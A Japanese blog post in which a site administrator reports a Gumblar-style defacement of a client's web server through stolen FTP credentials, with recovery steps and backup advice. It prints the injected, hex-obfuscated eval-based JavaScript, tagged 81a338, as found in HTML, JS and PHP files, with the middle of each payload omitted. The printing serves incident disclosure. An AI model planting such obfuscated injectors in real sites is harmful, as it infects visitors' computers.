WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

バナー ping 株式会社ニュース 背景 クリックランキング マルウエア ツール 上位表示 アドセンス 管理画面 SEO アクセスアップ プロモーション ネットビジネス wpXサーバー force puzzle 賢威 個人情報 株式会社WINGOOD 加工 ざくざく君 マイクロソフト ブロック 詐欺組織 ネットビジネス大全集 ping送信 固定ページ ツイッター グラデーション 自己アフィリ 放射線 大西良幸 伊藤 歩 81a338 ブラクラ 権利収入 iphone 百度 既得権益 株式会社SRシステム RSS Includes Pages 改ざん 比較 ドメイン エキスパートメール 短縮URL ロリポップ moza せどり 副業術 ライブチャット EC Baidu インターネット スカイプ タイガーウイング Yahoo 表示 IE サイト改ざん ウイルス ボタン ブルートフォースアタック 定型文 レイアウト 大園式転売塾 クラウド変換 管理ツール メルマガ配信システム 石井匠 wp-login.php インペリアルゴールド 感染 CS5 デスクトップ 申請金ビジネス 特定のメールアドレス functions.php HTML4.0 DOCTYPE クロスアフィリエイト 切り抜き レイアウト崩れ 原田真 SmoothScroll.js ブロックポリシー トラフィック 株式会社SRシステム YouTube Maniax 2017 もざ High Concept Marketing Thunderbird アンダーグラウンドアフィリエイトクラブ 大園麗花 office 短縮URLツール google 量産 優先順位 .htaccess ヤフオク ぼかし インフォトップ Tiger-Wing ソース ネットガレージ コピーボタン 伊藤 虎太郎 CS6 Line Login LockDown 池田純矢 立体 無断送信 与沢翼 改竄 無料 スタイルシート 村上省吾 転売大園塾 新井浩 レビュー 加藤 秀吉 css 関根義光 高速ゲーム レンタルサーバー Newpost Catch 人物 BUYMA 脆弱性 postpost Firefox 詐欺 復元 スマホ アフィリエイト RSS アイコン レタープレス ネットゲーム フレンドシップメール やしろ塾 アフィ匠 ハート Chrome バイドゥー エディタ html getElementById @PAGES 久積篤史 土屋ひろし 山下 ネオヒルズアカデミー WEB メモ タスクバー プラグイン マニュアル ヤフーショッピング 無料オファー フォローマティック 北川 雅嗣 followmatic シャンプー SyntaxHighlighter Adobe PPC PHP 中山秀人 流出 document.all ライオンアフィリエイト Agency Business 特権ビジネス バイマ インターネットエクスプローラー テーマ 不労所得の神 Cash on Wordpress 与沢翼×蝶乃舞 インターネットビジネススクール 伊藤塾 CGI 掲示板 wordpress トレンドアフィリエイト プロファイル ウインドウ エクスチェンジ リンクシェイカー Diamond Affiliate Masters Program android FireWorks 秀吉塾天下統一 がら空きビジネス 到達率 SKナレッジ Wordpress Content Slide XHTML 不正送信 BBIZ ムーバブルタイプ 三橋美仁 Google Maps バックアップ KMSpico 高額塾 自己アフィリエイト クラック Extension Manager 滑らか 日本語入力変換ソフト 伊藤虎太郎 IP KMS認証 ビジネス getElementByTagName 画像 アレックス 小笠原健一 DTD FTP 秒速で1億円稼ぐ男 ランキング explorer Windows ECサイト ワードプレス エクスプローラー 切抜き 蝶乃舞 Youtube ライン ネットビジネス最後の楽園 株式会社Free Agent Style ファビコン ソースコード 株式会社A-ブログレス ヤフー IBS Internet Explorer トレンドキーワード Favicon サンタ 不正アクセス LinkShaker 自動 ソフト モザイク 球体 MovableTYpe system Ban Hammer クラウド入力機能 株式会社バンザイ 音量アイコン 情報商材 登録禁止 twitter スムーズ 大園転売塾 MasterCollection ネットショップ セキュリティ アンダーグラウンドメソッド 宮田麗花 アレックス式ネオせどりスクール tool WP RMT 自動化 スクロール 配布 出店料 ブラウザ 個人情報流出 アクセス制限 関根塾 JavaScript Google Maps API パズル カスタマイズ ユーチューブマニアクス2017 MT Windows 7 テンプレート やしろひろたみ ブラシ

アーカイブ

エステトラブル

このページの先頭へ